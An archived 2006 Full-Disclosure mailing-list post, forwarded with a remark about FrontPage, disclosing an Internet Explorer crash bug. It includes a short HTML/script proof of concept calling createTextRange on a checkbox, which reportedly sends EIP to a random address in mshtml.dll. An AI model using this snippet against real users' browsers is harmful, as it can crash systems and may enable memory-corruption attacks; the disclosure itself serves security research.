lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed Mar 22 18:11:58 2006
From: Security at peadro.net (Terminal Entry)
Subject: FW: IE crash

The PoC below also causes MS FrontPage 2K3 to crash when previewing the code




-----Original Message-----
From: full-disclosure-bounces@...ts.grok.org.uk
[mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of Stelian
Ene
Sent: Wednesday, March 22, 2006 3:13 AM
To: full-disclosure@...ts.grok.org.uk
Cc: bugtraq@...urityfocus.com
Subject: [Full-disclosure] IE crash

I can't find any info on this delicious IE bug, but it seems to be
publicly known:

<input type="checkbox" id='c'>
<Xcript><!--
	r=document.getElementById("c");
	a=r.createTextRange();
--></Xcript>

It will badly access a (virtual?) pointer table, making EIP to jump at a
random
address. This has various effects on the system I've tested with,
including
crashing. It works on these versions of mshtml.dll:
XP SP2: 6.0.2900.2802 - latest
WS2003: 6.0.3790.0


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

This email and any files transmitted with it are confidential and intended
solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This
message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate,
distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your
system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this
information is strictly prohibited.

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060322/ce91f04f/attachment.html

Powered by blists - more mailing lists